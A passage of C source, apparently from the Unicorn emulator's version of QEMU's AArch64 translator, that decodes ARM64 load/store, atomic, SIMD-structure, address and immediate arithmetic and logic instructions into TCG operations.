*/ do_gpr_ld(s, tmp, clean_addr, size, is_signed, false, false, 0, false, false); tcg_gen_addi_i64(tcg_ctx, clean_addr, clean_addr, 1ULL << size); do_gpr_ld(s, tcg_rt2, clean_addr, size, is_signed, false, false, 0, false, false); tcg_gen_mov_i64(tcg_ctx, tcg_rt, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } else { do_gpr_st(s, tcg_rt, clean_addr, size, false, 0, false, false); tcg_gen_addi_i64(tcg_ctx, clean_addr, clean_addr, 1ULL << size); do_gpr_st(s, tcg_rt2, clean_addr, size, false, 0, false, false); } } if (wback) { if (postindex) { tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); } tcg_gen_mov_i64(tcg_ctx, cpu_reg_sp(s, rn), dirty_addr); } } /* * Load/store (immediate post-indexed) * Load/store (immediate pre-indexed) * Load/store (unscaled immediate) * * 31 30 29 27 26 25 24 23 22 21 20 12 11 10 9 5 4 0 * +----+-------+---+-----+-----+---+--------+-----+------+------+ * |size| 1 1 1 | V | 0 0 | opc | 0 | imm9 | idx | Rn | Rt | * +----+-------+---+-----+-----+---+--------+-----+------+------+ * * idx = 01 -> post-indexed, 11 pre-indexed, 00 unscaled imm. (no writeback) 10 -> unprivileged * V = 0 -> non-vector * size: 00 -> 8 bit, 01 -> 16 bit, 10 -> 32 bit, 11 -> 64bit * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 */ static void disas_ldst_reg_imm9(DisasContext *s, uint32_t insn, int opc, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rn = extract32(insn, 5, 5); int imm9 = sextract32(insn, 12, 9); int idx = extract32(insn, 10, 2); bool is_signed = false; bool is_store = false; bool is_extended = false; bool is_unpriv = (idx == 2); bool iss_valid = !is_vector; bool post_index; bool writeback; TCGv_i64 clean_addr, dirty_addr; if (is_vector) { size |= (opc & 2) << 1; if (size > 4 || is_unpriv) { unallocated_encoding(s); return; } is_store = ((opc & 1) == 0); if (!fp_access_check(s)) { return; } } else { if (size == 3 && opc == 2) { /* PRFM - prefetch */ if (idx != 0) { unallocated_encoding(s); return; } return; } if (opc == 3 && size > 1) { unallocated_encoding(s); return; } is_store = (opc == 0); is_signed = extract32(opc, 1, 1); is_extended = (size < 3) && extract32(opc, 0, 1); } switch (idx) { case 0: case 2: post_index = false; writeback = false; break; case 1: post_index = true; writeback = true; break; case 3: post_index = false; writeback = true; break; default: g_assert_not_reached(); } if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); if (!post_index) { tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, imm9); } clean_addr = clean_data_tbi(s, dirty_addr); if (is_vector) { if (is_store) { do_fp_st(s, rt, clean_addr, size); } else { do_fp_ld(s, rt, clean_addr, size); } } else { TCGv_i64 tcg_rt = cpu_reg(s, rt); int memidx = is_unpriv ? 
get_a64_user_mem_index(s) : get_mem_index(s); bool iss_sf = disas_ldst_compute_iss_sf(size, is_signed, opc); if (is_store) { do_gpr_st_memidx(s, tcg_rt, clean_addr, size, memidx, iss_valid, rt, iss_sf, false); } else { do_gpr_ld_memidx(s, tcg_rt, clean_addr, size, is_signed, is_extended, memidx, iss_valid, rt, iss_sf, false); } } if (writeback) { TCGv_i64 tcg_rn = cpu_reg_sp(s, rn); if (post_index) { tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, imm9); } tcg_gen_mov_i64(tcg_ctx, tcg_rn, dirty_addr); } } /* * Load/store (register offset) * * 31 30 29 27 26 25 24 23 22 21 20 16 15 13 12 11 10 9 5 4 0 * +----+-------+---+-----+-----+---+------+-----+--+-----+----+----+ * |size| 1 1 1 | V | 0 0 | opc | 1 | Rm | opt | S| 1 0 | Rn | Rt | * +----+-------+---+-----+-----+---+------+-----+--+-----+----+----+ * * For non-vector: * size: 00-> byte, 01 -> 16 bit, 10 -> 32bit, 11 -> 64bit * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 * For vector: * size is opc<1>:size<1:0> so 100 -> 128 bit; 110 and 111 unallocated * opc<0>: 0 -> store, 1 -> load * V: 1 -> vector/simd * opt: extend encoding (see DecodeRegExtend) * S: if S=1 then scale (essentially index by sizeof(size)) * Rt: register to transfer into/out of * Rn: address register or SP for base * Rm: offset register or ZR for offset */ static void disas_ldst_reg_roffset(DisasContext *s, uint32_t insn, int opc, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rn = extract32(insn, 5, 5); int shift = extract32(insn, 12, 1); int rm = extract32(insn, 16, 5); int opt = extract32(insn, 13, 3); bool is_signed = false; bool is_store = false; bool is_extended = false; TCGv_i64 tcg_rm, clean_addr, dirty_addr; if (extract32(opt, 1, 1) == 0) { unallocated_encoding(s); return; } if (is_vector) { size |= (opc & 2) << 1; if (size > 4) { unallocated_encoding(s); return; } is_store = !extract32(opc, 0, 1); if (!fp_access_check(s)) { return; } } else { if (size == 3 && opc == 2) { /* PRFM - prefetch */ return; } if (opc == 3 && size > 1) { unallocated_encoding(s); return; } is_store = (opc == 0); is_signed = extract32(opc, 1, 1); is_extended = (size < 3) && extract32(opc, 0, 1); } if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); tcg_rm = read_cpu_reg(s, rm, 1); ext_and_shift_reg(tcg_ctx, tcg_rm, tcg_rm, opt, shift ? 
size : 0); tcg_gen_add_i64(tcg_ctx, dirty_addr, dirty_addr, tcg_rm); clean_addr = clean_data_tbi(s, dirty_addr); if (is_vector) { if (is_store) { do_fp_st(s, rt, clean_addr, size); } else { do_fp_ld(s, rt, clean_addr, size); } } else { TCGv_i64 tcg_rt = cpu_reg(s, rt); bool iss_sf = disas_ldst_compute_iss_sf(size, is_signed, opc); if (is_store) { do_gpr_st(s, tcg_rt, clean_addr, size, true, rt, iss_sf, false); } else { do_gpr_ld(s, tcg_rt, clean_addr, size, is_signed, is_extended, true, rt, iss_sf, false); } } } /* * Load/store (unsigned immediate) * * 31 30 29 27 26 25 24 23 22 21 10 9 5 * +----+-------+---+-----+-----+------------+-------+------+ * |size| 1 1 1 | V | 0 1 | opc | imm12 | Rn | Rt | * +----+-------+---+-----+-----+------------+-------+------+ * * For non-vector: * size: 00-> byte, 01 -> 16 bit, 10 -> 32bit, 11 -> 64bit * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 * For vector: * size is opc<1>:size<1:0> so 100 -> 128 bit; 110 and 111 unallocated * opc<0>: 0 -> store, 1 -> load * Rn: base address register (inc SP) * Rt: target register */ static void disas_ldst_reg_unsigned_imm(DisasContext *s, uint32_t insn, int opc, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rn = extract32(insn, 5, 5); unsigned int imm12 = extract32(insn, 10, 12); unsigned int offset; TCGv_i64 clean_addr, dirty_addr; bool is_store; bool is_signed = false; bool is_extended = false; if (is_vector) { size |= (opc & 2) << 1; if (size > 4) { unallocated_encoding(s); return; } is_store = !extract32(opc, 0, 1); if (!fp_access_check(s)) { return; } } else { if (size == 3 && opc == 2) { /* PRFM - prefetch */ return; } if (opc == 3 && size > 1) { unallocated_encoding(s); return; } is_store = (opc == 0); is_signed = extract32(opc, 1, 1); is_extended = (size < 3) && extract32(opc, 0, 1); } if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); offset = imm12 << size; tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); clean_addr = clean_data_tbi(s, dirty_addr); if (is_vector) { if (is_store) { do_fp_st(s, rt, clean_addr, size); } else { do_fp_ld(s, rt, clean_addr, size); } } else { TCGv_i64 tcg_rt = cpu_reg(s, rt); bool iss_sf = disas_ldst_compute_iss_sf(size, is_signed, opc); if (is_store) { do_gpr_st(s, tcg_rt, clean_addr, size, true, rt, iss_sf, false); } else { do_gpr_ld(s, tcg_rt, clean_addr, size, is_signed, is_extended, true, rt, iss_sf, false); } } } /* Atomic memory operations * * 31 30 27 26 24 22 21 16 15 12 10 5 0 * +------+-------+---+-----+-----+---+----+----+-----+-----+----+-----+ * | size | 1 1 1 | V | 0 0 | A R | 1 | Rs | o3 | opc | 0 0 | Rn | Rt | * +------+-------+---+-----+-----+--------+----+-----+-----+----+-----+ * * Rt: the result register * Rn: base address or SP * Rs: the source register for the operation * V: vector flag (always 0 as of v8.3) * A: acquire flag * R: release flag */ static void disas_ldst_atomic(DisasContext *s, uint32_t insn, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rs = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int o3_opc = extract32(insn, 12, 4); bool r = extract32(insn, 22, 1); bool a = extract32(insn, 23, 1); TCGv_i64 tcg_rs, clean_addr; AtomicThreeOpFn *fn; if (is_vector || !dc_isar_feature(aa64_atomics, s)) { unallocated_encoding(s); return; } switch (o3_opc) { case 000: /* LDADD */ fn = tcg_gen_atomic_fetch_add_i64; break; case 001: /* LDCLR */ fn = tcg_gen_atomic_fetch_and_i64; break; case 002: /* LDEOR */ fn = 
tcg_gen_atomic_fetch_xor_i64; break; case 003: /* LDSET */ fn = tcg_gen_atomic_fetch_or_i64; break; case 004: /* LDSMAX */ fn = tcg_gen_atomic_fetch_smax_i64; break; case 005: /* LDSMIN */ fn = tcg_gen_atomic_fetch_smin_i64; break; case 006: /* LDUMAX */ fn = tcg_gen_atomic_fetch_umax_i64; break; case 007: /* LDUMIN */ fn = tcg_gen_atomic_fetch_umin_i64; break; case 010: /* SWP */ fn = tcg_gen_atomic_xchg_i64; break; case 014: /* LDAPR, LDAPRH, LDAPRB */ if (!dc_isar_feature(aa64_rcpc_8_3, s) || rs != 31 || a != 1 || r != 0) { unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); if (o3_opc == 014) { /* * LDAPR* are a special case because they are a simple load, not a * fetch-and-do-something op. * The architectural consistency requirements here are weaker than * full load-acquire (we only need "load-acquire processor consistent"), * but we choose to implement them as full LDAQ. */ do_gpr_ld(s, cpu_reg(s, rt), clean_addr, size, false, false, true, rt, disas_ldst_compute_iss_sf(size, false, 0), true); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); return; } tcg_rs = read_cpu_reg(s, rs, true); if (o3_opc == 1) { /* LDCLR */ tcg_gen_not_i64(tcg_ctx, tcg_rs, tcg_rs); } /* The tcg atomic primitives are all full barriers. Therefore we * can ignore the Acquire and Release bits of this instruction. */ fn(tcg_ctx, cpu_reg(s, rt), clean_addr, tcg_rs, get_mem_index(s), s->be_data | size | MO_ALIGN); } /* * PAC memory operations * * 31 30 27 26 24 22 21 12 11 10 5 0 * +------+-------+---+-----+-----+---+--------+---+---+----+-----+ * | size | 1 1 1 | V | 0 0 | M S | 1 | imm9 | W | 1 | Rn | Rt | * +------+-------+---+-----+-----+---+--------+---+---+----+-----+ * * Rt: the result register * Rn: base address or SP * V: vector flag (always 0 as of v8.3) * M: clear for key DA, set for key DB * W: pre-indexing flag * S: sign for imm9. */ static void disas_ldst_pac(DisasContext *s, uint32_t insn, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rn = extract32(insn, 5, 5); bool is_wback = extract32(insn, 11, 1); bool use_key_a = !extract32(insn, 23, 1); int offset; TCGv_i64 clean_addr, dirty_addr, tcg_rt; if (size != 3 || is_vector || !dc_isar_feature(aa64_pauth, s)) { unallocated_encoding(s); return; } if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); if (s->pauth_active) { if (use_key_a) { gen_helper_autda(tcg_ctx, dirty_addr, tcg_ctx->cpu_env, dirty_addr, tcg_ctx->cpu_X[31]); } else { gen_helper_autdb(tcg_ctx, dirty_addr, tcg_ctx->cpu_env, dirty_addr, tcg_ctx->cpu_X[31]); } } /* Form the 10-bit signed, scaled offset. */ offset = (extract32(insn, 22, 1) << 9) | extract32(insn, 12, 9); offset = sextract32(offset << size, 0, 10 + size); tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); /* Note that "clean" and "dirty" here refer to TBI not PAC. 
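 * When PAuth is active the pointer has already been authenticated by
 * the AUTDA/AUTDB helpers above; clean_data_tbi below merely strips
 * the top-byte tag before the access.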
*/ clean_addr = clean_data_tbi(s, dirty_addr); tcg_rt = cpu_reg(s, rt); do_gpr_ld(s, tcg_rt, clean_addr, size, /* is_signed */ false, /* extend */ false, /* iss_valid */ !is_wback, /* iss_srt */ rt, /* iss_sf */ true, /* iss_ar */ false); if (is_wback) { tcg_gen_mov_i64(tcg_ctx, cpu_reg_sp(s, rn), dirty_addr); } } /* * LDAPR/STLR (unscaled immediate) * * 31 30 24 22 21 12 10 5 0 * +------+-------------+-----+---+--------+-----+----+-----+ * | size | 0 1 1 0 0 1 | opc | 0 | imm9 | 0 0 | Rn | Rt | * +------+-------------+-----+---+--------+-----+----+-----+ * * Rt: source or destination register * Rn: base register * imm9: unscaled immediate offset * opc: 00: STLUR*, 01/10/11: various LDAPUR* * size: size of load/store */ static void disas_ldst_ldapr_stlr(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int offset = sextract32(insn, 12, 9); int opc = extract32(insn, 22, 2); int size = extract32(insn, 30, 2); TCGv_i64 clean_addr, dirty_addr; bool is_store = false; bool is_signed = false; bool extend = false; bool iss_sf; if (!dc_isar_feature(aa64_rcpc_8_4, s)) { unallocated_encoding(s); return; } switch (opc) { case 0: /* STLURB */ is_store = true; break; case 1: /* LDAPUR* */ break; case 2: /* LDAPURS* 64-bit variant */ if (size == 3) { unallocated_encoding(s); return; } is_signed = true; break; case 3: /* LDAPURS* 32-bit variant */ if (size > 1) { unallocated_encoding(s); return; } is_signed = true; extend = true; /* zero-extend 32->64 after signed load */ break; default: g_assert_not_reached(); } iss_sf = disas_ldst_compute_iss_sf(size, is_signed, opc); if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); clean_addr = clean_data_tbi(s, dirty_addr); if (is_store) { /* Store-Release semantics */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); do_gpr_st(s, cpu_reg(s, rt), clean_addr, size, true, rt, iss_sf, true); } else { /* * Load-AcquirePC semantics; we implement as the slightly more * restrictive Load-Acquire. 
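 * (Treating the weaker Load-AcquirePC as a full Load-Acquire is
 * always architecturally permissible, just potentially stronger
 * than required.)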
*/ do_gpr_ld(s, cpu_reg(s, rt), clean_addr, size, is_signed, extend, true, rt, iss_sf, true); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } } /* Load/store register (all forms) */ static void disas_ldst_reg(DisasContext *s, uint32_t insn) { int rt = extract32(insn, 0, 5); int opc = extract32(insn, 22, 2); bool is_vector = extract32(insn, 26, 1); int size = extract32(insn, 30, 2); switch (extract32(insn, 24, 2)) { case 0: if (extract32(insn, 21, 1) == 0) { /* Load/store register (unscaled immediate) * Load/store immediate pre/post-indexed * Load/store register unprivileged */ disas_ldst_reg_imm9(s, insn, opc, size, rt, is_vector); return; } switch (extract32(insn, 10, 2)) { case 0: disas_ldst_atomic(s, insn, size, rt, is_vector); return; case 2: disas_ldst_reg_roffset(s, insn, opc, size, rt, is_vector); return; default: disas_ldst_pac(s, insn, size, rt, is_vector); return; } break; case 1: disas_ldst_reg_unsigned_imm(s, insn, opc, size, rt, is_vector); return; } unallocated_encoding(s); } /* AdvSIMD load/store multiple structures * * 31 30 29 23 22 21 16 15 12 11 10 9 5 4 0 * +---+---+---------------+---+-------------+--------+------+------+------+ * | 0 | Q | 0 0 1 1 0 0 0 | L | 0 0 0 0 0 0 | opcode | size | Rn | Rt | * +---+---+---------------+---+-------------+--------+------+------+------+ * * AdvSIMD load/store multiple structures (post-indexed) * * 31 30 29 23 22 21 20 16 15 12 11 10 9 5 4 0 * +---+---+---------------+---+---+---------+--------+------+------+------+ * | 0 | Q | 0 0 1 1 0 0 1 | L | 0 | Rm | opcode | size | Rn | Rt | * +---+---+---------------+---+---+---------+--------+------+------+------+ * * Rt: first (or only) SIMD&FP register to be transferred * Rn: base address or SP * Rm (post-index only): post-index register (when !31) or size dependent #imm */ static void disas_ldst_multiple_struct(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 10, 2); int opcode = extract32(insn, 12, 4); bool is_store = !extract32(insn, 22, 1); bool is_postidx = extract32(insn, 23, 1); bool is_q = extract32(insn, 30, 1); TCGv_i64 clean_addr, tcg_rn, tcg_ebytes; MemOp endian = s->be_data; int ebytes; /* bytes per element */ int elements; /* elements per vector */ int rpt; /* num iterations */ int selem; /* structure elements */ int r; if (extract32(insn, 31, 1) || extract32(insn, 21, 1)) { unallocated_encoding(s); return; } if (!is_postidx && rm != 0) { unallocated_encoding(s); return; } /* From the shared decode logic */ switch (opcode) { case 0x0: rpt = 1; selem = 4; break; case 0x2: rpt = 4; selem = 1; break; case 0x4: rpt = 1; selem = 3; break; case 0x6: rpt = 3; selem = 1; break; case 0x7: rpt = 1; selem = 1; break; case 0x8: rpt = 1; selem = 2; break; case 0xa: rpt = 2; selem = 1; break; default: unallocated_encoding(s); return; } if (size == 3 && !is_q && selem != 1) { /* reserved */ unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (rn == 31) { gen_check_sp_alignment(s); } /* For our purposes, bytes are always little-endian. */ if (size == 0) { endian = MO_LE; } /* Consecutive little-endian elements from a single register * can be promoted to a larger little-endian operation. */ if (selem == 1 && endian == MO_LE) { size = 3; } ebytes = 1 << size; elements = (is_q ? 
16 : 8) / ebytes; tcg_rn = cpu_reg_sp(s, rn); clean_addr = clean_data_tbi(s, tcg_rn); tcg_ebytes = tcg_const_i64(tcg_ctx, ebytes); for (r = 0; r < rpt; r++) { int e; for (e = 0; e < elements; e++) { int xs; for (xs = 0; xs < selem; xs++) { int tt = (rt + r + xs) % 32; if (is_store) { do_vec_st(s, tt, e, clean_addr, size, endian); } else { do_vec_ld(s, tt, e, clean_addr, size, endian); } tcg_gen_add_i64(tcg_ctx, clean_addr, clean_addr, tcg_ebytes); } } } tcg_temp_free_i64(tcg_ctx, tcg_ebytes); if (!is_store) { /* For non-quad operations, setting a slice of the low * 64 bits of the register clears the high 64 bits (in * the ARM ARM pseudocode this is implicit in the fact * that 'rval' is a 64 bit wide variable). * For quad operations, we might still need to zero the * high bits of SVE. */ for (r = 0; r < rpt * selem; r++) { int tt = (rt + r) % 32; clear_vec_high(s, is_q, tt); } } if (is_postidx) { if (rm == 31) { tcg_gen_addi_i64(tcg_ctx, tcg_rn, tcg_rn, rpt * elements * selem * ebytes); } else { tcg_gen_add_i64(tcg_ctx, tcg_rn, tcg_rn, cpu_reg(s, rm)); } } } /* AdvSIMD load/store single structure * * 31 30 29 23 22 21 20 16 15 13 12 11 10 9 5 4 0 * +---+---+---------------+-----+-----------+-----+---+------+------+------+ * | 0 | Q | 0 0 1 1 0 1 0 | L R | 0 0 0 0 0 | opc | S | size | Rn | Rt | * +---+---+---------------+-----+-----------+-----+---+------+------+------+ * * AdvSIMD load/store single structure (post-indexed) * * 31 30 29 23 22 21 20 16 15 13 12 11 10 9 5 4 0 * +---+---+---------------+-----+-----------+-----+---+------+------+------+ * | 0 | Q | 0 0 1 1 0 1 1 | L R | Rm | opc | S | size | Rn | Rt | * +---+---+---------------+-----+-----------+-----+---+------+------+------+ * * Rt: first (or only) SIMD&FP register to be transferred * Rn: base address or SP * Rm (post-index only): post-index register (when !31) or size dependent #imm * index = encoded in Q:S:size dependent on size * * lane_size = encoded in R, opc * transfer width = encoded in opc, S, size */ static void disas_ldst_single_struct(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 10, 2); int S = extract32(insn, 12, 1); int opc = extract32(insn, 13, 3); int R = extract32(insn, 21, 1); int is_load = extract32(insn, 22, 1); int is_postidx = extract32(insn, 23, 1); int is_q = extract32(insn, 30, 1); int scale = extract32(opc, 1, 2); int selem = (extract32(opc, 0, 1) << 1 | R) + 1; bool replicate = false; int index = is_q << 3 | S << 2 | size; int ebytes, xs; TCGv_i64 clean_addr, tcg_rn, tcg_ebytes; if (extract32(insn, 31, 1)) { unallocated_encoding(s); return; } if (!is_postidx && rm != 0) { unallocated_encoding(s); return; } switch (scale) { case 3: if (!is_load || S) { unallocated_encoding(s); return; } scale = size; replicate = true; break; case 0: break; case 1: if (extract32(size, 0, 1)) { unallocated_encoding(s); return; } index >>= 1; break; case 2: if (extract32(size, 1, 1)) { unallocated_encoding(s); return; } if (!extract32(size, 0, 1)) { index >>= 2; } else { if (S) { unallocated_encoding(s); return; } index >>= 3; scale = 3; } break; default: g_assert_not_reached(); } if (!fp_access_check(s)) { return; } ebytes = 1 << scale; if (rn == 31) { gen_check_sp_alignment(s); } tcg_rn = cpu_reg_sp(s, rn); clean_addr = clean_data_tbi(s, tcg_rn); tcg_ebytes = tcg_const_i64(tcg_ctx, ebytes); for (xs = 0; xs < selem; xs++) { if (replicate) { /* Load and replicate to all 
elements */ TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_tmp, clean_addr, get_mem_index(s), s->be_data + scale); tcg_gen_gvec_dup_i64(tcg_ctx, scale, vec_full_reg_offset(s, rt), (is_q + 1) * 8, vec_full_reg_size(s), tcg_tmp); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } else { /* Load/store one element per register */ if (is_load) { do_vec_ld(s, rt, index, clean_addr, scale, s->be_data); } else { do_vec_st(s, rt, index, clean_addr, scale, s->be_data); } } tcg_gen_add_i64(tcg_ctx, clean_addr, clean_addr, tcg_ebytes); rt = (rt + 1) % 32; } tcg_temp_free_i64(tcg_ctx, tcg_ebytes); if (is_postidx) { if (rm == 31) { tcg_gen_addi_i64(tcg_ctx, tcg_rn, tcg_rn, selem * ebytes); } else { tcg_gen_add_i64(tcg_ctx, tcg_rn, tcg_rn, cpu_reg(s, rm)); } } } /* Loads and stores */ static void disas_ldst(DisasContext *s, uint32_t insn) { if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_MEM_READ, s->pc_curr) || HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_MEM_WRITE, s->pc_curr)) { // sync PC if there are memory hooks. // TODO: Better granularity by checking ldst type and corresponding hook type gen_a64_set_pc_im(s->uc->tcg_ctx, s->pc_curr); } switch (extract32(insn, 24, 6)) { case 0x08: /* Load/store exclusive */ disas_ldst_excl(s, insn); break; case 0x18: case 0x1c: /* Load register (literal) */ disas_ld_lit(s, insn); break; case 0x28: case 0x29: case 0x2c: case 0x2d: /* Load/store pair (all forms) */ disas_ldst_pair(s, insn); break; case 0x38: case 0x39: case 0x3c: case 0x3d: /* Load/store register (all forms) */ disas_ldst_reg(s, insn); break; case 0x0c: /* AdvSIMD load/store multiple structures */ disas_ldst_multiple_struct(s, insn); break; case 0x0d: /* AdvSIMD load/store single structure */ disas_ldst_single_struct(s, insn); break; case 0x19: /* LDAPR/STLR (unscaled immediate) */ if (extract32(insn, 10, 2) != 0 || extract32(insn, 21, 1) != 0) { unallocated_encoding(s); break; } disas_ldst_ldapr_stlr(s, insn); break; default: unallocated_encoding(s); break; } } /* PC-rel. addressing * 31 30 29 28 24 23 5 4 0 * +----+-------+-----------+-------------------+------+ * | op | immlo | 1 0 0 0 0 | immhi | Rd | * +----+-------+-----------+-------------------+------+ */ static void disas_pc_rel_adr(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int page, rd; uint64_t base; uint64_t offset; page = extract32(insn, 31, 1); /* SignExtend(immhi:immlo) -> offset */ offset = sextract64(insn, 5, 19); offset = offset << 2 | extract32(insn, 29, 2); rd = extract32(insn, 0, 5); base = s->pc_curr; if (page) { /* ADRP (page based) */ base &= ~0xfff; offset <<= 12; } tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), base + offset); } /* * Add/subtract (immediate) * * 31 30 29 28 24 23 22 21 10 9 5 4 0 * +--+--+--+-----------+-----+-------------+-----+-----+ * |sf|op| S| 1 0 0 0 1 |shift| imm12 | Rn | Rd | * +--+--+--+-----------+-----+-------------+-----+-----+ * * sf: 0 -> 32bit, 1 -> 64bit * op: 0 -> add , 1 -> sub * S: 1 -> set flags * shift: 00 -> LSL imm by 0, 01 -> LSL imm by 12 */ static void disas_add_sub_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); uint64_t imm = extract32(insn, 10, 12); int shift = extract32(insn, 22, 2); bool setflags = extract32(insn, 29, 1); bool sub_op = extract32(insn, 30, 1); bool is_64bit = extract32(insn, 31, 1); TCGv_i64 tcg_rn = cpu_reg_sp(s, rn); TCGv_i64 tcg_rd = setflags ? 
cpu_reg(s, rd) : cpu_reg_sp(s, rd); TCGv_i64 tcg_result; switch (shift) { case 0x0: break; case 0x1: imm <<= 12; break; default: unallocated_encoding(s); return; } tcg_result = tcg_temp_new_i64(tcg_ctx); if (!setflags) { if (sub_op) { tcg_gen_subi_i64(tcg_ctx, tcg_result, tcg_rn, imm); } else { tcg_gen_addi_i64(tcg_ctx, tcg_result, tcg_rn, imm); } } else { TCGv_i64 tcg_imm = tcg_const_i64(tcg_ctx, imm); if (sub_op) { gen_sub_CC(tcg_ctx, is_64bit, tcg_result, tcg_rn, tcg_imm); } else { gen_add_CC(tcg_ctx, is_64bit, tcg_result, tcg_rn, tcg_imm); } tcg_temp_free_i64(tcg_ctx, tcg_imm); } if (is_64bit) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); } tcg_temp_free_i64(tcg_ctx, tcg_result); } /* The input should be a value in the bottom e bits (with higher * bits zero); returns that value replicated into every element * of size e in a 64 bit integer. */ static uint64_t bitfield_replicate(uint64_t mask, unsigned int e) { assert(e != 0); while (e < 64) { mask |= mask << e; e *= 2; } return mask; } /* Return a value with the bottom len bits set (where 0 < len <= 64) */ static inline uint64_t bitmask64(unsigned int length) { assert(length > 0 && length <= 64); return ~0ULL >> (64 - length); } /* Simplified variant of pseudocode DecodeBitMasks() for the case where we * only require the wmask. Returns false if the imms/immr/immn are a reserved * value (ie should cause a guest UNDEF exception), and true if they are * valid, in which case the decoded bit pattern is written to result. */ bool logic_imm_decode_wmask(uint64_t *result, unsigned int immn, unsigned int imms, unsigned int immr) { uint64_t mask; unsigned e, levels, s, r; int len; assert(immn < 2 && imms < 64 && immr < 64); /* The bit patterns we create here are 64 bit patterns which * are vectors of identical elements of size e = 2, 4, 8, 16, 32 or * 64 bits each. Each element contains the same value: a run * of between 1 and e-1 non-zero bits, rotated within the * element by between 0 and e-1 bits. * * The element size and run length are encoded into immn (1 bit) * and imms (6 bits) as follows: * 64 bit elements: immn = 1, imms = <length of run - 1> * 32 bit elements: immn = 0, imms = 0 : <length of run - 1> * 16 bit elements: immn = 0, imms = 10 : <length of run - 1> * 8 bit elements: immn = 0, imms = 110 : <length of run - 1> * 4 bit elements: immn = 0, imms = 1110 : <length of run - 1> * 2 bit elements: immn = 0, imms = 11110 : <length of run - 1> * Notice that immn = 0, imms = 11111x is the only combination * not covered by one of the above options; this is reserved. * Further, <length of run - 1> all-ones is a reserved pattern. * * In all cases the rotation is by immr % e (and immr is 6 bits). */ /* First determine the element size */ len = 31 - clz32((immn << 6) | (~imms & 0x3f)); if (len < 1) { /* This is the immn == 0, imms == 0x11111x case */ return false; } e = 1 << len; levels = e - 1; s = imms & levels; r = immr & levels; if (s == levels) { /* <length of run - 1> mustn't be all-ones. */ return false; } /* Create the value of one element: s+1 set bits rotated * by r within the element (which is e bits wide)... 
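 *
 * Worked example (illustrative): immn=0, imms=0b111100, immr=0 gives
 * len = 1, i.e. e = 2-bit elements each containing a run of s+1 = 1
 * set bit with no rotation, which replicates to 0x5555555555555555;
 * with immr=1 the bit is rotated within each element, yielding
 * 0xaaaaaaaaaaaaaaaa instead.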
*/ mask = bitmask64(s + 1); if (r) { mask = (mask >> r) | (mask << (e - r)); mask &= bitmask64(e); } /* ...then replicate the element over the whole 64 bit value */ mask = bitfield_replicate(mask, e); *result = mask; return true; } /* Logical (immediate) * 31 30 29 28 23 22 21 16 15 10 9 5 4 0 * +----+-----+-------------+---+------+------+------+------+ * | sf | opc | 1 0 0 1 0 0 | N | immr | imms | Rn | Rd | * +----+-----+-------------+---+------+------+------+------+ */ static void disas_logic_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, opc, is_n, immr, imms, rn, rd; TCGv_i64 tcg_rd, tcg_rn; uint64_t wmask; bool is_and = false; sf = extract32(insn, 31, 1); opc = extract32(insn, 29, 2); is_n = extract32(insn, 22, 1); immr = extract32(insn, 16, 6); imms = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); if (!sf && is_n) { unallocated_encoding(s); return; } if (opc == 0x3) { /* 